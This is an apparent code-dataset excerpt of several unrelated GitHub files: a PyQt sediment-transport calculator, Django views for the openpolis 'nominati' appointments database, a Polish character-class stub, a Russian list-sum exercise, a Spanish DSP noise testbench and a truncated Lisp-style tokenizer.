float(self.Faixa9LineEdit.text())/100, float(self.Faixa10LineEdit.text())/100,\n                  float(self.Faixa11LineEdit.text())/100] # percentages converted to fractions\n\n            Local = str(self.LocalLineEdit.text())\n            GMS = 165.36 # specific weight of sediment lb/ft^3\n            SG = 2.65 # relative density of sediment, dimensionless\n            TEMP = float(self.TempLineEdit.text()) #Celsius\n            S = float(self.DeclivLineEdit.text()) # slope = energy gradient ft/ft\n\n        except:\n            print(\"Verifique os dados de entrada.\")\n            QtGui.QMessageBox.warning(self, 'Erro!', \"Verifique os dados de entrada.\")\n            return\n        \n        if sum(ib)>1:\n            QtGui.QMessageBox.warning(self, 'Erro!', \"Soma das faixas maior que 100%\")\n        \n        U = math.sqrt(g*Y*S)\n        \n        COMP1 = 1.0334+0.03672*TEMP+0.0002058*TEMP**2\n        XNU = 0.00002/COMP1\n\n        COMP2 = 6 * XNU\n        FV50 = (math.sqrt(36.064*DF50**3+COMP2**2)-COMP2)/DF50\n        \n        CY = [[0.1000, 
0.2000, 0.3000, 0.400, 0.8000, 0.0000, 0.0000],\n [0.6100, 0.4800, 0.3000, 0.300, 0.3000, 0.0000, 0.0000],\n [1.4530, 1.3290, 1.4000, 1.260, 1.0990, 0.0000, 0.0000],\n [0.0100, 5.0000, 10.0000, 15.600, 20.0000, 30.0000, 40.0000],\n [0.1057, 0.0845, 0.0469, 0.000, -0.0277, -0.0654, -0.1155],\n [0.0735, 0.0166, 0.0014, 0.000, -0.0164, -0.0610, -0.0763],\n [0.0118, 0.0202, 0.0135, 0.000, 0.0000, 0.0000, 0.0000]]\n \n CF = [0.64, 1.0, 1.0, 0.88, 0.2]\n\n AF = [[0.00001,\t0.06,\t0.10,\t0.20,\t0.4,\t0.80,\t1.50,\t2.00,\t3.00,\t7.00,\t8.00,\t9.00,\t10.0],\n [0.0010,\t0.24,\t0.60, 1.80,\t4.6,\t9.50,\t16.1,\t19.9,\t25.3,\t39.5,\t41.5,\t43.5,\t45.0],\n [0.0001,\t0.32,\t0.76,\t2.20,\t5.3,\t10.5,\t16.9,\t20.3,\t25.6,\t39.5,\t41.5,\t43.5,\t45.0],\n [0.0001,\t0.40, 0.92,\t2.50,\t5.8,\t11.0,\t17.5,\t20.7,\t25.9,\t39.5,\t41.5,\t43.5,\t45.0],\n [0.0001,\t0.49,\t1.10,\t2.85,\t6.3,\t11.6,\t17.9,\t21.1,\t26.2,\t39.5,\t41.5,\t43.5,\t45.0],\n [0.0001,\t0.57,\t1.26,\t3.20,\t6.7,\t12.0,\t18.1,\t21.5,\t26.5,\t39.5,\t41.5,\t43.5,\t45.0]]\n\n DIP = [0,0.37,0.71,0.99,1.21,1.34,1.41,1.38,1.27,1.11,0.94,0.78,0.65,0.55,0.49,0.45,0.42,0.4]\n \n AK0 = -0.068\n AK1 = -1.1328\n AK2 = 0.94\n AK3 = -1.206\n AK4 = 0.567\n AK5 = -0.0975\n \n DFT = []\n Fgran = [0.016, 0.062, 0.125, 0.25, 0.5, 1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 64.0]\n\n Fgranlabel = ['0.0 - 0.062', '0.062 - 0.125', '0.125 - 0.25',\n '0.25 - 0.5', '0.5 - 1.0', '1.0 - 2.0', '2.0 - 4.0', '4.0 - 8.0',\n '8.0 - 16.0', '16.0 - 32.0', '32.0 - 64.0']\n \n for i in range(len(Fgran)-1):\n DFT.append(math.sqrt(Fgran[i]*Fgran[i+1])/304.8)\n\n Dm = 0\n for D, i in zip(DFT, ib):\n Dm = Dm + D*304.8*i\n\n wbk = xlsxwriter.Workbook(Local+'.xlsx')\n sheetSInt = wbk.add_worksheet(\"Sist Internacional\")\n sheetSIng = wbk.add_worksheet(\"Sist Ingles\")\n \n row = 0\n\n ErrorMessages = []\n \n if self.LaursenCheckBox.isChecked():\n try:\n #print \"Laursen\", Laursen(DFT, ib, V, SG, g, Y, XNU, U, DF50, W)\n ResultLaursen = Laursen(DFT, ib, V, SG, g, Y, XNU, U, DF50, W)\n row = WriteResultsFaixa('Laursen', ResultLaursen, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 1)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.EngelundeHansenCheckBox.isChecked():\n try:\n #print \"EngelundeHansen\", EngelundeHansen(GMS, V, S, DF50, g, SG, W, Y)\n ResultEngelundeHansen = EngelundeHansen(GMS, V, S, DF50, g, SG, W, Y)\n row = WriteResultsFaixa('EngelundeHansen', ResultEngelundeHansen, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.ColbyCheckBox.isChecked():\n try:\n #print \"Colby\", Colby(DF50, Y, V, CY, CF, W, TEMP)\n ResultColby = Colby(DF50, Y, V, CY, CF, W, TEMP)\n row = WriteResultsFaixa('Colby', ResultColby, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.AckersWhiteD35CheckBox.isChecked():\n try:\n #print \"AckersWhiteD35\", AckersWhite(DF35, g, SG, XNU, U, V, Y, W)\n ResultAckersWhite = AckersWhite(DF35, g, SG, XNU, U, V, Y, W)\n row = WriteResultsFaixa('AckersWhiteD35', ResultAckersWhite, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.AckersWhiteD50CheckBox.isChecked():\n try:\n #print \"AckersWhiteD50\", AckersWhite(DF50, g, SG, XNU, U, V, Y, W)\n ResultAckersWhite = AckersWhite(DF50, g, SG, XNU, U, V, Y, W)\n row = WriteResultsFaixa('AckersWhiteD50', ResultAckersWhite, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if 
self.YangSandD50CheckBox.isChecked():\n try:\n #print \"YangSandD50\", YangD50('Sand', FV50, DF50, TEMP, AF, D, U, XNU, V, S, Y, W)\n ResultYangSandD50 = YangD50('Sand', FV50, DF50, TEMP, AF, D, U, XNU, V, S, Y, W)\n row = WriteResultsFaixa('YangSandD50', ResultYangSandD50, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.YangSandFTCheckBox.isChecked():\n try:\n #print \"YangSandFT\", YangFT('Sand', ib, DFT, TEMP, AF, XNU, U, V, S, Y, W)\n ResultYangSandFT = YangFT('Sand', ib, DFT, TEMP, AF, XNU, U, V, S, Y, W)\n row = WriteResultsFaixa('YangSandFT', ResultYangSandFT, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 1)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.YangGravelD50CheckBox.isChecked():\n try:\n #print \"YangGravelD50\", YangD50('Gravel', FV50, DF50, TEMP, AF, D, U, XNU, V, S, Y, W)\n ResultYangGravelD50 = YangD50('Gravel', FV50, DF50, TEMP, AF, D, U, XNU, V, S, Y, W)\n row = WriteResultsFaixa('YangGravelD50', ResultYangGravelD50, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.YangGravelFTCheckBox.isChecked():\n try:\n #print \"YangGravelFT\", YangFT('Gravel', ib, DFT, TEMP, AF, XNU, U, V, S, Y, W)\n ResultYangGravelSF = YangFT('Gravel', ib, DFT, TEMP, AF, XNU, U, V, S, Y, W)\n row = WriteResultsFaixa('YangGravelFT', ResultYangGravelSF, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 1)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.YangMixCheckBox.isChecked():\n try:\n #print \"YangMixFT\", YangFT('Mixture', ib, DFT, TEMP, AF, XNU, U, V, S, Y, W)\n ResultYangMixFT = YangFT('Mixture', ib, DFT, TEMP, AF, XNU, U, V, S, Y, W)\n row = WriteResultsFaixa('YangMixFT', ResultYangMixFT, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 1)\n except Exception as e:\n ErrorMessages.append(e)\n\n## if self.ToffaletiCheckBox.isChecked():\n## NLD = 1.0\n## try:\n## print \"Toffaleti\", Toffaleti(TEMP, Y, S, V, DF65, g, XNU, DFT, DIP, ib, AF, NLD, W)\n## ResultToffaleti = Toffaleti(TEMP, Y, S, V, DF65, g, XNU, DFT, DIP, ib, AF, NLD, W)\n## row = WriteResultsFaixa('Toffaleti', ResultToffaleti, ib, Fgranlabel[1:], row, sheetSInt, sheetSIng, 1)\n## except Exception as e:\n## ErrorMessages.append(e)\n\n if self.SchoklitschCheckBox.isChecked():\n try:\n #print \"Schoklitsch\", Schoklitsch(DFT, ib, S, Y, V, W)\n ResultSchoklitsch = Schoklitsch(DFT, ib, S, Y, V, W)\n row = WriteResultsFaixa('Schoklitsch', ResultSchoklitsch, ib, Fgranlabel, row, sheetSInt, sheetSIng, 1)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.KallinskeCheckBox.isChecked():\n try:\n #print \"Kalinske\", Kalinske(DFT, ib, AK0, AK1, AK2, AK3, AK4, AK5, Y, V, S, W)\n ResultKalinske = Kalinske(DFT, ib, AK0, AK1, AK2, AK3, AK4, AK5, Y, V, S, W)\n row = WriteResultsFaixa('Kalinske', ResultKalinske, ib, Fgranlabel, row, sheetSInt, sheetSIng, 1)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.MeyerPeterICheckBox.isChecked():\n try:\n #print \"MeyerPetereMuller\", MeyerPetereMuller(DF90, Dm, Y, V, S, W)\n ResultMeyerPetereMuller = MeyerPetereMuller(DF90, Dm, Y, V, S, W)\n row = WriteResultsFaixa('MeyerPetereMuller', ResultMeyerPetereMuller, ib, Fgranlabel, row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if self.RottnerCheckBox.isChecked():\n try:\n #print \"Rottner\", Rottner(GMS, SG, g, Y, V, DF50, W)\n ResultRottner = Rottner(GMS, SG, g, Y, V, DF50, W)\n row = WriteResultsFaixa('Rottner', ResultRottner, ib, 
Fgranlabel, row, sheetSInt, sheetSIng, 0)\n except Exception as e:\n ErrorMessages.append(e)\n\n if row == 0:\n QtGui.QMessageBox.warning(self, 'Erro!', \"Selecione um metodo.\")\n wbk.close()\n return\n\n wbk.close()\n\n if ErrorMessages != []:\n errorhand = open('Erros.txt', 'w')\n print('Error messages:')\n for e in ErrorMessages:\n print(e)\n print >>errorhand, e\n QtGui.QMessageBox.information(self, 'Aviso:', \"Checar mensagens de erro!\")\n else:\n QtGui.QMessageBox.information(self, 'Sucesso!', \"Resultados exportados!\")\n\ndef main():\n app = QtGui.QApplication(sys.argv) # A new instance of QApplication\n form = MainApp() # We set the form to be our MainApp\n form.show() # Show the form\n app.exec_() # and execute the app\n\nif __name__ == '__main__':\n main()\n","repo_name":"Robcampeao/Sedim2","sub_path":"Sedim2.py","file_name":"Sedim2.py","file_ext":"py","file_size_in_byte":35046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29048363713","text":"from django.db.models.aggregates import Count, Sum\nfrom django.db.models.query_utils import Q\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom django.shortcuts import render_to_response, redirect\nfrom django.core.serializers import serialize\nfrom django.conf import settings\nfrom django.views.generic import TemplateView, View\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\nfrom django.db.models.query import QuerySet\nfrom django.utils.functional import curry\nfrom django.template.defaultfilters import slugify\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n\nfrom nominati.models import Incarico, Ente, Persona, TipoCarica, Regione, Partecipata, Bilancio, Partecipazione\nimport json\nfrom json.encoder import JSONEncoder\nimport urllib2\nfrom datetime import datetime, timedelta\n\nclass AccessControlView(object):\n \"\"\"\n Define access control for the view\n \"\"\"\n @method_decorator(login_required)\n def dispatch(self, *args, **kwargs):\n return super(AccessControlView, self).dispatch(*args, **kwargs)\n\n\nclass DjangoJSONEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, QuerySet):\n # `default` must return a python serializable\n # structure, the easiest way is to load the JSON\n # string produced by `serialize` and return it\n\n return json.dumps([t for t in obj])\n # return json.loads(serialize('json', obj, ))\n\n return JSONEncoder.default(self,obj)\n # return json.dumps([unicode(t) for t in obj])\n\n\ndumps = curry(json.dumps, cls=DjangoJSONEncoder)\n\nclass JSONResponseMixin(object):\n def render_to_response(self, context):\n \"Returns a JSON response containing 'context' as payload\"\n return self.get_json_response(self.convert_context_to_json(context))\n\n def get_json_response(self, content, **httpresponse_kwargs):\n \"Construct an `HttpResponse` object.\"\n return HttpResponse(content,\n content_type='application/json',\n **httpresponse_kwargs)\n\n def convert_context_to_json(self, context):\n \"Convert the context dictionary into a JSON object\"\n # Note: This is *EXTREMELY* naive; in reality, you'll need\n # to do much more complex handling to ensure that arbitrary\n # objects -- such as Django model instances or querysets\n # -- can be serialized as JSON.\n return dumps(context)\n\n\nclass RegioneListView(AccessControlView, ListView):\n model = Regione\n\n\nclass PartecipateView(AccessControlView):\n 
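'''Shared helper view: subclasses fill self.partecipate and self.incarichi, and get_context_data builds the table selected by the ?tipo= GET parameter.'''\n    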
model = None\n incarichi = []\n partecipate = []\n context_object_name=''\n base_template=''\n context = {}\n\n\n def get_context_data(self, **kwargs ):\n context = super(PartecipateView, self).get_context_data(**kwargs)\n\n tipologia = self.request.GET.get('tipo',)\n\n context['SITE_URL'] = settings.SITE_URL\n context['OP_URL'] = settings.OP_URL\n\n now = datetime.now()\n context['table'] = []\n context['base_template'] = self.base_template\n self.template_name = self.base_template\n partecipate = self.partecipate\n incarichi = self.incarichi\n context['base_template']= self.base_template\n\n if tipologia != '':\n\n if tipologia =='part_tipologia':\n context['table'] = partecipate.\\\n annotate(n_inc=Count('incarico')).\\\n annotate(s_inc=Sum('incarico__compenso_totale')).\\\n order_by('tipologia_partecipata')\n self.template_name = \"nominati/part_tipologia.html\"\n\n if tipologia == 'part_competenze':\n context['table'] = partecipate.order_by('-competenza_partecipata')\n self.template_name = \"nominati/part_competenze.html\"\n\n if tipologia == 'part_finalita':\n context['table'] = partecipate.order_by('-finalita_partecipata')\n self.template_name = \"nominati/part_finalita.html\"\n\n if tipologia == 'part_resoconto':\n partecipate_ids = partecipate.values_list('codice_fiscale')\n bilancio_part={}\n for b in Bilancio.objects.filter(partecipata_cf__codice_fiscale__in=partecipate_ids):\n if b.partecipata_cf not in bilancio_part:\n bilancio_part[b.partecipata_cf] = b\n elif b.resoconto is not None and b.anno > bilancio_part[b.partecipata_cf].anno:\n bilancio_part[b.partecipata_cf] = b\n\n context['table']=sorted(bilancio_part.values(),key=lambda bilancio: bilancio.resoconto)\n self.template_name = \"nominati/part_resoconto.html\"\n\n if tipologia == 'amm_tot':\n\n context['n_amministratori_uomini'] = incarichi.filter(persona__sesso=1).values('persona').distinct().count()\n context['n_amministratori_donne'] = incarichi.filter(persona__sesso=0).values('persona').distinct().count()\n context['n_amministratori'] =context['n_amministratori_donne']+context['n_amministratori_uomini']\n\n # age levels and filters\n ages = [\n {\n 'age':'under 25',\n 'filters': {\n 'persona__data_nascita__gt': now-timedelta(days=9131.05),\n }\n },\n {\n 'age':'tra 25 e 35',\n 'filters': {\n 'persona__data_nascita__gt': now-timedelta(days=12783.5),\n 'persona__data_nascita__lte': now-timedelta(days=9131.05),\n }\n },\n {\n 'age':'tra 35 e 45',\n 'filters': {\n 'persona__data_nascita__gt': now-timedelta(days=16435.9),\n 'persona__data_nascita__lte': now-timedelta(days=12783.5),\n }\n },\n {\n 'age':'tra 45 e 55',\n 'filters': {\n 'persona__data_nascita__gt': now-timedelta(days=20088.3),\n 'persona__data_nascita__lte': now-timedelta(days=16435.9),\n }\n },\n {\n 'age':'tra 55 e 65',\n 'filters': {\n 'persona__data_nascita__gt': now-timedelta(days=23740.7),\n 'persona__data_nascita__lte': now-timedelta(days=20088.3),\n }\n },\n {\n 'age':'over 65',\n 'filters': {\n 'persona__data_nascita__lte': now-timedelta(days=23740.7),\n }\n },\n {\n 'age':'unknown',\n 'filters': {\n 'persona__data_nascita__isnull': True,\n }\n },\n ]\n\n\n for item in ages:\n context['table'].append({\n 'age': item['age'],\n 'all': incarichi.filter(**item['filters']).values('persona').distinct().count(),\n 'male': incarichi.\\\n filter(**item['filters']).filter(persona__sesso=Persona.MALE_SEX).\\\n values('persona').distinct().count(),\n 'female': incarichi.\\\n filter(**item['filters']).filter(persona__sesso=Persona.FEMALE_SEX).\\\n 
values('persona').distinct().count(),\n })\n context['n_amministratori_tipo_carica'] = []\n for c in TipoCarica.objects.all():\n context['n_amministratori_tipo_carica'].append(\n {\n 'denominazione': c.denominazione,\n 'tot': incarichi.filter(tipo_carica=c).values('persona').distinct().count(),\n 'uomini': incarichi.filter(tipo_carica=c).\\\n filter(persona__sesso=Persona.MALE_SEX).\\\n values('persona').distinct().count(),\n 'donne': incarichi.filter(tipo_carica=c).\\\n filter(persona__sesso=Persona.FEMALE_SEX).\\\n values('persona').distinct().count()\n }\n )\n\n self.template_name = 'nominati/amm_tot.html'\n\n if tipologia == 'amm_politici':\n\n context['table'] = incarichi.\\\n filter(persona__openpolis_id__isnull=False).\\\n exclude(persona__openpolis_id='').\\\n order_by('persona__cognome').distinct()\n\n self.template_name = 'nominati/amm_politici.html'\n\n if tipologia == 'amm_incarichi':\n\n context['table'] = incarichi.\\\n values('persona', 'persona__nome', 'persona__cognome').\\\n annotate(n=Count('persona')).order_by('-n')\n\n self.template_name = 'nominati/amm_incarichi.html'\n\n if tipologia == 'amm_compenso':\n\n context['table'] = incarichi.\\\n values('persona', 'persona__nome', 'persona__cognome').\\\n annotate(s=Sum('compenso_totale')).order_by('-s')\n\n self.template_name = 'nominati/amm_compenso.html'\n\n if tipologia == 'lista_nominati':\n\n lista_nominati = incarichi.\\\n select_related('persona', 'tipo_carica', 'partecipata_cf', 'ente_nominante_cf').\\\n annotate(nInc = Count('persona__incarico')).\\\n order_by('persona__cognome')\n\n context['table']=lista_nominati\n self.template_name = 'nominati/lista_nominati.html'\n\n return context\n\n\n\n\n\nclass RegioneDetailView(PartecipateView, DetailView):\n model = Regione\n context_object_name = \"regione\"\n base_template='nominati/regione_detail.html'\n\n\n def get_context_data(self, **kwargs ):\n r = self.get_object()\n now = datetime.now()\n self.partecipate = Partecipata.objects.all().filter(ente__regione = r).select_related().distinct()\n self.incarichi = Incarico.objects.filter(ente_nominante_cf__regione = r).\\\n filter(Q(data_inizio__lte=now) &\n (Q(data_fine__gte=now) | Q(data_fine__isnull=True)))\n self.context = super(RegioneDetailView, self).get_context_data(**kwargs)\n\n return self.context\n\n\nclass NazioneView(PartecipateView, TemplateView):\n\n template_name='nominati/nazione_detail.html'\n\n\n def get_context_data(self, **kwargs):\n\n now = datetime.now()\n self.base_template = self.template_name\n self.partecipate = Partecipata.objects.all().select_related().distinct()\n\n tipologia = self.request.GET.get('tipo',)\n if tipologia == 'amm_compenso':\n\n self.incarichi= Incarico.objects.all().\\\n filter(Q(data_inizio__lte=now) &\n (Q(data_fine__gte=now) | Q(data_fine__isnull=True))).\\\n values('persona', 'persona__nome', 'persona__cognome').\\\n annotate(s=Sum('compenso_totale')).filter(s__gte=100000).order_by('-s')\n\n elif tipologia =='amm_incarichi':\n self.incarichi = Incarico.objects.all().\\\n filter(Q(data_inizio__lte=now) &\n (Q(data_fine__gte=now) | Q(data_fine__isnull=True))).\\\n values('persona', 'persona__nome', 'persona__cognome').\\\n annotate(n=Count('persona')).filter(n__gt=2).order_by('-n')\n\n else:\n self.incarichi = Incarico.objects.all().\\\n filter(Q(data_inizio__lte=now) &\n (Q(data_fine__gte=now) | Q(data_fine__isnull=True)))\n\n self.context = super(NazioneView, self).get_context_data(**kwargs)\n self.context['n_partecipate'] = self.partecipate.count()\n return 
self.context\n\n\nclass EnteDetailView(PartecipateView, DetailView):\n    model = Ente\n    context_object_name = \"ente\"\n    queryset = Ente.objects.all()\n    base_template='nominati/ente_detail.html'\n\n    def get_context_data(self, **kwargs):\n        e = self.get_object()\n        now = datetime.now()\n        self.partecipate = Partecipata.objects.all().filter(ente__codice_fiscale=e.codice_fiscale).select_related().distinct()\n        self.incarichi = Incarico.objects.filter(ente_nominante_cf=e.codice_fiscale).\\\n            filter(Q(data_inizio__lte=now) &\n                   (Q(data_fine__gte=now) | Q(data_fine__isnull=True)))\n        self.context = super(EnteDetailView, self).get_context_data(**kwargs)\n\n        return self.context\n\n\nclass EnteListView(AccessControlView, ListView):\n    model = Ente\n\n    def get_context_data(self, **kwargs):\n        context = super(EnteListView, self).get_context_data(**kwargs)\n        context['SITE_URL'] = settings.SITE_URL\n        return context\n\n    def get_queryset(self):\n        if 'qterm' in self.request.GET:\n            qterm = self.request.GET['qterm']\n            return Ente.objects.filter(denominazione__icontains=qterm)[0:50]\n        else:\n            return Ente.objects.all()[0:50]\n\n\nclass EnteJSONListView(JSONResponseMixin, EnteListView):\n    def convert_context_to_json(self, context):\n        return dumps(context['ente_list'])\n\n\n\nclass PartecipazioneListView(AccessControlView, ListView):\n    model = Partecipazione\n\n    def get_context_data(self, **kwargs):\n        context = super(PartecipazioneListView, self).get_context_data(**kwargs)\n        context['SITE_URL'] = settings.SITE_URL\n        return context\n\n    def get_queryset(self):\n        if 'istat' in self.request.GET and 'anno' in self.request.GET:\n            istat = self.request.GET['istat']\n            anno = self.request.GET['anno']\n            return Partecipazione.objects.\\\n                filter(anno=anno, ente_cf__codice_istat=istat).\\\n                values('partecipata_cf__codice_fiscale','partecipata_cf__denominazione','percentuale_partecipazione')\n\n\n\nclass PartecipazioneJSONListView(JSONResponseMixin, PartecipazioneListView):\n    def convert_context_to_json(self, context):\n        if 'partecipazione_list' in context and len(context['partecipazione_list'])>0:\n            return dumps(context['partecipazione_list'])\n\n\nclass MergePersona_OP(View):\n\n    def post(self, *args, **kwargs):\n        #set the attrib openpolis_id for the selected persona\n        if self.request.POST is not None:\n            post = self.request.POST\n            persona_id = post['persona_id']\n            birth_location = post['birth_location']\n            birth_date = post['birth_date']\n\n            p = Persona.objects.get(pk=persona_id)\n            # write op_id, birth date and birthplace when we merge\n            p.openpolis_id = post['openpolis_id']\n            p.luogo_nascita = post['birth_location']\n            p.data_nascita = post['birth_date']\n\n            p.save()\n        return redirect(post['return_page'])\n\n\nclass RemovePersona_OP(View):\n\n    def post(self, *args, **kwargs):\n        #remove the attrib openpolis_id for the selected persona\n        if self.request.POST is not None:\n            post = self.request.POST\n            persona_id = post['persona_id']\n            p = Persona.objects.get(pk=persona_id)\n            # remove op_id, birth date and birthplace when we reject the similarity\n            p.openpolis_id = None\n            p.data_nascita = None\n            p.luogo_nascita = None\n            p.save()\n        return redirect(post['return_page'])\n\n\nclass NominatiHome(AccessControlView, TemplateView):\n\n    template_name = \"nominati/home.html\"\n    def get(self, request, *args, **kwargs):\n        if self.request.user.is_authenticated():\n            return render_to_response('nominati/home.html')\n        else:\n            return redirect('login/?next=/')\n\n\ndef check_similars_views(request, object_id):\n    if not (request.user.is_authenticated() and 
request.user.is_staff):\n return HttpResponseNotFound('
<h1>Page not found</h1>
')\n    \n    obj = Persona.objects.get(pk=object_id)\n    \n    url = \"http://api.openpolis.it/op/1.0/similar_politicians/\"\n    url += \"?first_name=%s&last_name=%s\" % (obj.nome, obj.cognome)\n    #, content_type='application/json; charset=utf-8'\n    return HttpResponse(json.dumps(get_json_response(url), indent=4), mimetype=\"application/json\")\n    \n    \ndef get_json_response(url):\n    \"\"\"\n    generic method to get json response from url,\n    using basic authentication\n    \"\"\"\n    username = settings.OP_API_USER\n    password = settings.OP_API_PASS\n\n    # this creates a password manager\n    passman = urllib2.HTTPPasswordMgrWithDefaultRealm()\n    passman.add_password(None, url, username, password)\n    # because we have put None at the start it will always\n    # use this username/password combination for urls\n    # for which `theurl` is a super-url\n\n    authhandler = urllib2.HTTPBasicAuthHandler(passman)\n    # create the AuthHandler\n\n    opener = urllib2.build_opener(authhandler)\n    urllib2.install_opener(opener)\n    # All calls to urllib2.urlopen will now use our handler\n    # Make sure not to include the protocol in with the URL, or\n    # HTTPPasswordMgrWithDefaultRealm will be very confused.\n    # You must (of course) use it when fetching the page though.\n\n    response = urllib2.urlopen(url)\n    return json.loads(response.read())\n\n\n","repo_name":"openpolis/op_nominati","sub_path":"nominati/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70509215771","text":"import random\n\nclass KlasaPostaci:\n    def __init__(self, Rasa, Imie, Nazwisko, Wiek, Wzrost, Moc, Broń, Pancerz): # character data\n\n        self.Rasa = Rasa #str\n        self.Imie = Imie #str\n        self.Nazwisko = Nazwisko #str\n        self.Wiek = Wiek #int\n        self.Wzrost = Wzrost #int\n        self.Moc = Moc #str\n        self.Broń = Broń #str\n        self.Pancerz = Pancerz #str\n\n    def Void(self):\n        print(\"SELF\")\n\n    def GenerowaniePostaci(self):\n        ### RACE\n        self.Rasa = input(\"Podaj wartosc_float: \") or \"Losowe\"\n        if self.Rasa == \"Losowe\":\n            self.Rasa = random.choice(ListaRas) # NOTE: ListaRas (the list of races) is not defined in this file\n            print(\"Wylosowane wartosc_float to \" + self.Rasa)\n        else:\n            print(\"Wpisane wartosc_string to \" + self.Rasa)\n    \nPostać = KlasaPostaci(\"\",\"\",\"\",0,0,\"\",\"\",\"\")\nPostać.Void()\n","repo_name":"BlyatTukan/ADIM","sub_path":"Piotrek/Zadanie1.py","file_name":"Zadanie1.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5013789560","text":"\"\"\"\nLesson 3. Data, functions and modules in Python\n\n1- Define a list of several numbers. Write a program that finds\n the sum of the list elements standing at odd positions.\n\nExample:\n[2, 3, 5, 9, 3] -> the elements at odd positions are 3 and 9, answer: 12\n\n\"\"\"\n\nmy_nums = [2, 3, 5, 9, 3]\n'''\nSolution 1. Using the sum_elements function to find\nthe sum of the elements at odd positions\n'''\n\n\ndef sum_elements(my_nums):\n    sum = 0\n    for i in range(len(my_nums)):\n        if i % 2 != 0:\n            sum += my_nums[i]\n    return sum\n\n\nprint(\n    f'Сумма элементов списка - [2, 3, 5, 9, 3], стоящих на нечётной позиции ='\n    f' {sum_elements(my_nums)}')\n\n\n'''\nSolution 2. 
Using Python's built-in functions\n'''\nmy_nums = [4, 6, 8, 3, 12, 5, 3, 7, 10]\n\nprint(\n    f'Сумма элементов списка - [4, 6, 8, 3, 12, 5, 3, 7, 10], стоящих на нечётной позиции ='\n    f' {sum([my_nums[i] for i in range(len(my_nums)) if i % 2 != 0])}')\n\n","repo_name":"GrafanyS/pythonSeminar","sub_path":"SeminarLesson3/Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36930079950","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 29 20:42:58 2018\n\n@author: Francisco\n\"\"\"\n\nfrom scipy.fftpack import fft\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport pdsmodulos.generador as gen\nimport numpy as np\nimport pdsmodulos.tools as tools\n\ndef testbench():\n    \n    fs = 1000\n    N = 1000\n    \n    a0 = 1\n    f0 = 10\n    \n    tiempo, señal1 = gen.generador_senoidal(fs, f0, N, a0)\n    tools.spectrum_analyzer(señal1, fs, N)\n    \n    tiempo, señal2 = gen.generador_ruido(fs, N, mean = 0, variance = 5)\n    tools.spectrum_analyzer(señal2, fs, N)\n    \n    tiempo, señal3 = gen.generador_ruido(fs, N, distribution = 'Uniform', high = 2, low = -2)\n    tools.spectrum_analyzer(señal3, fs, N)\n    \n    tiempo, señal4 = gen.generador_ruido(fs, N, distribution = 'Triangular')\n    tools.spectrum_analyzer(señal4, fs, N)\n    \n    plt.figure()\n    plt.subplot(4,1,1)\n    plt.hist(señal1, bins=10)  # arguments are passed to np.histogram\n    plt.subplot(4,1,2)\n    plt.hist(señal2, bins=10)  # arguments are passed to np.histogram\n    plt.subplot(4,1,3)\n    plt.hist(señal3, bins=10)  # arguments are passed to np.histogram\n    plt.subplot(4,1,4)\n    plt.hist(señal4, bins=10)  # arguments are passed to np.histogram\n    \n\ntestbench()\n\n","repo_name":"franmaiocchi/DSP","sub_path":"Clases/Analizador.py","file_name":"Analizador.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43286262120","text":"class Token:\n    def __init__(self, token_type, val=None):\n        self.token_type = token_type\n        self.val = val\n    \n    def __str__(self):\n        return f'{self.token_type}:{self.val}'\n    \n    def __eq__(self, other):\n        if isinstance(other, Token):\n            return self.token_type == other.token_type and self.val == other.val\n        return False\n\ndef preprocess_string_expression(exp):\n    \"\"\"Clean the expression\"\"\"\n    # remove line comments\n    exp = [line for line in exp.split('\\n') if len(line)>0 and line[0] != ';']\n    exp = ' '.join(exp)\n    exp = exp.replace('\\n', ' ')\n    \n    # reduce multiple spaces to one\n    while exp.find('  ')>0:\n        exp = exp.replace('  ', ' ')\n\n    return exp\n\ndef tokenize(exp):\n    exp = preprocess_string_expression(exp)\n\n    tokens = []\n    w = ''\n    list_open = False\n    string_open = False\n    \n    def add_word():\n        nonlocal w\n        if w != '':\n            tokens.append(Token('word', w))\n            w = ''\n    \n    index = 0\n    while index < len(exp): \n        k = exp[index]\n        if k == '(':\n            tokens.append(Token('open'))\n        \n        elif k == ')':\n            add_word()\n            tokens.append(Token('list_close' if list_open else 'close'))\n            list_open = False\n        \n        elif k == 